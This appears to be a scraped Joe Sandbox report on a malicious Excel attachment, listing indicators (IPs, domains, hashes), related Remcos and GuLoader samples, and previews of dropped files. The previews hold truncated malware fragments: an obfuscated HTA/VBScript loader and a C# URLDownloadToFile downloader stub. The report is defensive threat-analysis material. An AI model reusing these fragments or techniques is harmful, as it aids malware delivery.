        http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.428803298.000000001A7B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        88.99.66.38
        zhort.deGermany
        24940HETZNER-ASDEfalse
        192.3.243.166
        unknownUnited States
        36352AS-COLOCROSSINGUStrue
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1500266
        Start date and time:2024-08-28 07:00:03 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 7m 51s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:24
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:Thermo Fisher RFQ_TFS-1805.xls
        Detection:MAL
        Classification:mal100.troj.expl.evad.winXLS@23/47@3/2
        EGA Information:
        • Successful, ratio: 60%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 117
        • Number of non-executed functions: 58
        Cookbook Comments:
        • Found application associated with file extension: .xls
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Active ActiveX Object
        • Active ActiveX Object
        • Active ActiveX Object
        • Scroll down
        • Close Viewer
        • Override analysis time to 66853.0964665463 for current running targets taking high CPU consumption
        • Override analysis time to 133706.192933093 for current running targets taking high CPU consumption
        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 104.208.16.93
        • Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, legacywatson.trafficmanager.net
        • Execution Graph export aborted for target mshta.exe, PID 3148 because there are no executed function
        • Execution Graph export aborted for target mshta.exe, PID 3756 because there are no executed function
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.
        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        TimeTypeDescription
        01:01:16API Interceptor87x Sleep call for process: mshta.exe modified
        01:01:19API Interceptor151x Sleep call for process: powershell.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        88.99.66.38PO_304234.xlsGet hashmaliciousRemcosBrowse
          RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
            M12_20240821.xlsGet hashmaliciousRemcosBrowse
              PO_20931.xlsGet hashmaliciousRemcosBrowse
                350.xlsGet hashmaliciousFormBookBrowse
                  PO082724.xlsGet hashmaliciousRemcosBrowse
                    SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                      SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                        RFQ_0826024.xla.xlsxGet hashmaliciousRemcosBrowse
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          zhort.dePO_304234.xlsGet hashmaliciousRemcosBrowse
                          • 88.99.66.38
                          RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                          • 88.99.66.38
                          M12_20240821.xlsGet hashmaliciousRemcosBrowse
                          • 88.99.66.38
                          PO_20931.xlsGet hashmaliciousRemcosBrowse
                          • 88.99.66.38
                          350.xlsGet hashmaliciousFormBookBrowse
                          • 88.99.66.38
                          PO082724.xlsGet hashmaliciousRemcosBrowse
                          • 88.99.66.38
                          SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                          • 88.99.66.38
                          SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                          • 88.99.66.38
                          RFQ_0826024.xla.xlsxGet hashmaliciousRemcosBrowse
                          • 88.99.66.38
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          HETZNER-ASDEPO_304234.xlsGet hashmaliciousRemcosBrowse
                          • 88.99.66.38
                          RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                          • 88.99.66.38
                          ZKB - Zahlungsbest#U00e4tigung an 20240828.pdf.exeGet hashmaliciousQuasarBrowse
                          • 195.201.57.90
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 94.130.188.148
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 94.130.188.148
                          file.exeGet hashmaliciousLummaC, VidarBrowse
                          • 94.130.188.148
                          Setup.exeGet hashmaliciousVidarBrowse
                          • 94.130.188.148
                          file.exeGet hashmaliciousVidarBrowse
                          • 94.130.188.148
                          Vak#U0131fBank - #U00d6deme onay makbuzu 20240826.pdf.exeGet hashmaliciousQuasarBrowse
                          • 195.201.57.90
                          Faktura.vbsGet hashmaliciousRemcosBrowse
                          • 135.181.213.52
                          AS-COLOCROSSINGUSBukti-Transfer.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 192.210.215.11
                          PO_304234.xlsGet hashmaliciousRemcosBrowse
                          • 192.3.193.155
                          RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                          • 107.172.31.21
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                          • 107.172.31.21
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                          • 198.46.178.181
                          another.rtfGet hashmaliciousRemcosBrowse
                          • 198.46.178.137
                          RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 192.210.214.138
                          RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 192.210.214.138
                          RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 192.210.214.138
                          PO_20931.xlsGet hashmaliciousRemcosBrowse
                          • 192.3.64.135
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          7dcce5b76c8b17472d024758970a406bPO_304234.xlsGet hashmaliciousRemcosBrowse
                          • 88.99.66.38
                          RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                          • 88.99.66.38
                          RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 88.99.66.38
                          M12_20240821.xlsGet hashmaliciousRemcosBrowse
                          • 88.99.66.38
                          RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 88.99.66.38
                          PO_20931.xlsGet hashmaliciousRemcosBrowse
                          • 88.99.66.38
                          350.xlsGet hashmaliciousFormBookBrowse
                          • 88.99.66.38
                          PO082724.xlsGet hashmaliciousRemcosBrowse
                          • 88.99.66.38
                          Inv 30532.xlsGet hashmaliciousRemcosBrowse
                          • 88.99.66.38
                          PA-INV0230824 AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                          • 88.99.66.38
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\Temp\nsn59E.tmp\LangDLL.dllFedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            IMG_00991ORDER_FILES.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              FedEx Shipping Confirmation.exeGet hashmaliciousGuLoaderBrowse
                                IMG_00991ORDER_FILES.exeGet hashmaliciousGuLoaderBrowse
                                  SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                                    C:\Users\user\AppData\Local\Temp\nsn59E.tmp\System.dllFedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      IMG_00991ORDER_FILES.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        FedEx Shipping Confirmation.exeGet hashmaliciousGuLoaderBrowse
                                          IMG_00991ORDER_FILES.exeGet hashmaliciousGuLoaderBrowse
                                            SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                                              AKgHw6grDP.exeGet hashmaliciousGuLoaderBrowse
                                                AKgHw6grDP.exeGet hashmaliciousGuLoaderBrowse
                                                  PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    PaymentAdvice_SWIFT _USD39060-AUG-7-070224-000214.scr.exeGet hashmaliciousGuLoaderBrowse
                                                      RFQ-SMC-PO-5547-SUPPLY.com.exeGet hashmaliciousGuLoaderBrowse
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):15189
                                                        Entropy (8bit):5.0343247648743
                                                        Encrypted:false
                                                        SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                        MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                        SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                        SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                        SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                        Malicious:false
                                                        Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Preview:@...e...........................................................
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):117468
                                                        Entropy (8bit):2.1649833429842724
                                                        Encrypted:false
                                                        SSDEEP:48:7oa+apd7Ah23jRIs7QH02s7QrAFM+NL2SHk5UpykNh/Tr0ffmas7Qus7QslyXoZv:Ea+M7xIL02gK+SX8dh/TrjaKkNaAT
                                                        MD5:F9979E4423E493867C4E7E8A6A2F849C
                                                        SHA1:6072B16BD4AF6374AAA12CDBB13AD3DE9C45F867
                                                        SHA-256:63D2C51ECA31D953B73A6CA4D6462C90D87D44EE480FD02AEF078ADDD1CBF3AE
                                                        SHA-512:D2ECA2B1A0A499F0413A75D1A5CA1423860AA18FEB74B40E972BD7C0F9B137809332B5A05C84E09BAC24AEADA626349382CA43271BA075770C613EBECC6A9561
                                                        Malicious:true
                                                        Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CScRipT%252520tyPE%25253D%252522text/vBScriPT%252522%25253E%25250ADIM%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Category:dropped
                                                        Size (bytes):598995
                                                        Entropy (8bit):7.939175852041835
                                                        Encrypted:false
                                                        SSDEEP:12288:QGGeiix5RTllnAk73cL0MZzeQanklniQGMi7B1mSwIhCjVn7:QGGei6tML0MZzeVKiQWB1mSlCjV7
                                                        MD5:A80E27FBED396BE3D87FE48DA3C4F266
                                                        SHA1:469ED03EC17F52D63DCDA80D8D359AC39243A05C
                                                        SHA-256:04E187973BDA002B985079AED6F596DD6E252BE61F59B09D2AE4D9775A295378
                                                        SHA-512:216EC349F4B32273CD91F8A840C1FE4F302D8845A0F94A63E45A1CB972FAD5786E93A153EBDE39014F7A4532D8D2B94F1A9342D8125700EA3043F726B101810A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L....C.f.................h....:...../5............@...........................=...........@..........................................p=..[...........................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x.9.........................@....ndata........:..........................rsrc....[...p=..\..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                        Category:dropped
                                                        Size (bytes):4527404
                                                        Entropy (8bit):3.8573411297737294
                                                        Encrypted:false
                                                        SSDEEP:24576:OYNVUoJCoJeoJfoJuZLqAjBfBf6Fm+qw8W5/qIjB/Rfy5m+qw4/:OYNuoJCoJeoJfoJD
                                                        MD5:8A188A6917AD1FA0C7F1AA20A63C8593
                                                        SHA1:4D2270D647D4A3680B47E85501C7AB1442DDCBB2
                                                        SHA-256:728A3D9B1BEE7CD8BAA90AA0B1A4805A93238C8F835EA685931AC676BA7EF3E3
                                                        SHA-512:823246CAC3D8A45980CE0623C485FB0B74CE7AA68CCA37B22FEF1924685F1201298163C398688057736EC4551999B5455DB1C97ABC7DA97E5A07589CD4FD7CDF
                                                        Malicious:false
                                                        Preview:....l...............X................5.. EMF....,.E.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                        Category:dropped
                                                        Size (bytes):4056
                                                        Entropy (8bit):1.929653848333741
                                                        Encrypted:false
                                                        SSDEEP:12:YB1uOUvJqRENEtEtEdEdEdEO6Mcs/vs9/09v89fE9vM9/U9Lzlm97z9m9Lz1m9bO:Y7uTvJqRiGGWWWRKqurbkdBvae
                                                        MD5:4A103FC1809C8EA381D2ACB5380EF4F6
                                                        SHA1:6C81D37798C4D78C64E7D3EF7EB2ACB317C9FF67
                                                        SHA-256:1AB8F5ABD845FFD0C61A61BB09BFCF20569B80B4496BCCB58C623753CF40485C
                                                        SHA-512:77DA8AB022505D77F89749E97628CAF4DD8414251CB673598ACBA8F7D30D1889037FAB30094A6CE7DC47293697A6BEF28B92364D00129B59D2FC3711C82650F5
                                                        Malicious:false
                                                        Preview:....l...........0...............C'...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1.......'.......................%...........................................................&...........................%...........................6.......0.......%...........L...d.........../...............0.......!...
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                        Category:dropped
                                                        Size (bytes):4056
                                                        Entropy (8bit):1.929653848333741
                                                        Encrypted:false
                                                        SSDEEP:12:YB1uOUvJqRENEtEtEdEdEdEO6Mcs/vs9/09v89fE9vM9/U9Lzlm97z9m9Lz1m9bO:Y7uTvJqRiGGWWWRKqurbkdBvae
                                                        MD5:4A103FC1809C8EA381D2ACB5380EF4F6
                                                        SHA1:6C81D37798C4D78C64E7D3EF7EB2ACB317C9FF67
                                                        SHA-256:1AB8F5ABD845FFD0C61A61BB09BFCF20569B80B4496BCCB58C623753CF40485C
                                                        SHA-512:77DA8AB022505D77F89749E97628CAF4DD8414251CB673598ACBA8F7D30D1889037FAB30094A6CE7DC47293697A6BEF28B92364D00129B59D2FC3711C82650F5
                                                        Malicious:false
                                                        Preview:....l...........0...............C'...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1.......'.......................%...........................................................&...........................%...........................6.......0.......%...........L...d.........../...............0.......!...
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                        Category:dropped
                                                        Size (bytes):4527404
                                                        Entropy (8bit):3.8573411297737294
                                                        Encrypted:false
                                                        SSDEEP:24576:OYNVUoJCoJeoJfoJuZLqAjBfBf6Fm+qw8W5/qIjB/Rfy5m+qw4/:OYNuoJCoJeoJfoJD
                                                        MD5:8A188A6917AD1FA0C7F1AA20A63C8593
                                                        SHA1:4D2270D647D4A3680B47E85501C7AB1442DDCBB2
                                                        SHA-256:728A3D9B1BEE7CD8BAA90AA0B1A4805A93238C8F835EA685931AC676BA7EF3E3
                                                        SHA-512:823246CAC3D8A45980CE0623C485FB0B74CE7AA68CCA37B22FEF1924685F1201298163C398688057736EC4551999B5455DB1C97ABC7DA97E5A07589CD4FD7CDF
                                                        Malicious:false
                                                        Preview:....l...............X................5.. EMF....,.E.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (349)
                                                        Category:dropped
                                                        Size (bytes):471
                                                        Entropy (8bit):3.922727193748455
                                                        Encrypted:false
                                                        SSDEEP:6:V/DsYLDS81zuVj6GMOfJNQXReKJ8SRHy4Hk5YlZmSq1JbNN1sk/Qy:V/DTLDfuMqIXfHQk2JDDIy
                                                        MD5:BD6185508A590C854E7FCC04BE543F48
                                                        SHA1:95022ADA31E64C295B7AA33DB8DDF51611416FFA
                                                        SHA-256:24E899445F90CCDCBFDD0FC00E30478BDCEF7FDDEAD4433282DCD8D76377B359
                                                        SHA-512:CB7098DF32345652EC9DF25878BC4B1B776FB055555CEF806A44B211288E1F61DFCDCB403C2B320F6B75B3991125EC48A49987F01CE58F8C471933303C74BB1E
                                                        Malicious:false
                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace WrJAbtMW.{. public class puQguhDXQy. {. [DllImport("uRLmoN.dLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr pFcZcjYz,string ssXeQ,string fcUzP,uint YJgQHKv,IntPtr UrB);.. }..}.
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):369
                                                        Entropy (8bit):5.26129201071018
                                                        Encrypted:false
                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fUzxs7+AEszIP23fR:p37Lvkmb6KzsWZEoJ
                                                        MD5:413A985FA0BD2797B7FA9610E57F3BB1
                                                        SHA1:2317FF96590CB6E7F06337EBD9F37957F986CDBB
                                                        SHA-256:70069A7FED5AD5CB5D6C807F88AF2BCC08758596D2B354F71772C4B811D76779
                                                        SHA-512:55A0C4D825FD5F228A00B3C518E5A02D148AF63D60A2F6EBC8AF23BA54586A7580733D671B92D90A9106496C60756E28C78D86E7C667B288FB3B63F1FB569E8A
                                                        Malicious:false
                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.0.cs"
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3072
                                                        Entropy (8bit):2.8611840815235317
                                                        Encrypted:false
                                                        SSDEEP:24:etGSZPBG5eAdF8eaHbWkE80NRRC5ytkZf4GfMEWI+ycuZhNSakSaPNnq:6SsAdeeUb49NRkXJ4QMn1ulSa3Wq
                                                        MD5:AEC27B48F3A9D47A43B0CFB5E7BAC307
                                                        SHA1:E378C66F0641267D66042CA102F842FBADAAF078
                                                        SHA-256:DED459D922124FBDB7F4143566B63094C66A51DEF2AA08CAF5C413C3E4B1F100
                                                        SHA-512:20EDD4F74FE8D1BB63F6E437A7FCBD63329DCC54A68089DC850155C7BA6DD4AA1045050543A9480525A02E29136E255FE8D64B1EF37029F5F238E560F384990B
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..f...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................;.4.....{.....{...........................".............. B.....P ......T.........Z.....c.....i.....o.....w...T.....T...!.T.....T.......!.....*.......B.......................................+..........<Module>.4x
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                        Category:modified
                                                        Size (bytes):866
                                                        Entropy (8bit):5.35960154575367
                                                        Encrypted:false
                                                        SSDEEP:24:AId3ka6KzdEoMKaMD5DqBVKVrdFAMBJTH:Akka60dEoMKdDcVKdBJj
                                                        MD5:F61D1C33AD03A7C1BF59FCA018D3C7EF
                                                        SHA1:1847FB001DC59B8C52737272269CD490D983A1BD
                                                        SHA-256:3731186DB4B0C5AD69F2876DF86F53CE6FA4B2E5D2E55B4E245B18E71DDF8678
                                                        SHA-512:4439E9BF60D4FC14B05AF0262BBB337EF1A7D27266AF2D00DC9D50930AAE7B107AAB9D1234E15F3260F6EAB8B06AC11784AB02A58C51F4AF1C4FF6646FA7B846
                                                        Malicious:false
                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:MSVC .res
                                                        Category:dropped
                                                        Size (bytes):652
                                                        Entropy (8bit):3.105008462213705
                                                        Encrypted:false
                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0ak7YnqqaPN5Dlq5J:+RI+ycuZhNSakSaPNnqX
                                                        MD5:2D7CF783551A71F8D2982CEB40978A46
                                                        SHA1:6FDE6CA7BE25B650A2EBB3A30B26DD7EEFBE43E8
                                                        SHA-256:BB6FE4262E526C9C5488FB406FB335DE8ACC1094742EC1D069AC4F35923517F5
                                                        SHA-512:FF986C432A57849C25A0BB7D84F06346C7AD1C8EBC24B4DD99EB136AD7057921067C732E8CA17CFF9A7303265581A5D1797DB10C5D766ED457329297B559DFA5
                                                        Malicious:false
                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.x.n.x.d.p.z.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.x.n.x.d.p.z.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Aug 28 05:01:23 2024, 1st section name ".debug$S"
                                                        Category:dropped
                                                        Size (bytes):1328
                                                        Entropy (8bit):3.976055427783028
                                                        Encrypted:false
                                                        SSDEEP:24:H+e9E2UBZHdHQwKdNWI+ycuZhNjakS1PNnqSqd:WBZ9fKd41ulja3vqSK
                                                        MD5:71BA396073C353B04EE38AECC039F910
                                                        SHA1:5B8F9C3B70CE0BE3C0E8D1F34C4C7AD4FB0AC0C5
                                                        SHA-256:A792036796284169F26B127AD8F53C4531A04638523744C585D4D7B5838FABF4
                                                        SHA-512:866FB39FCCDFE35BD4843C410609EEB835801655C9695D9D7ACA4F080A21B9B90AA9C0037FB468E21949E8A7C9551CA1F9B278FFFE99704D9D94997C7548DAB8
                                                        Malicious:false
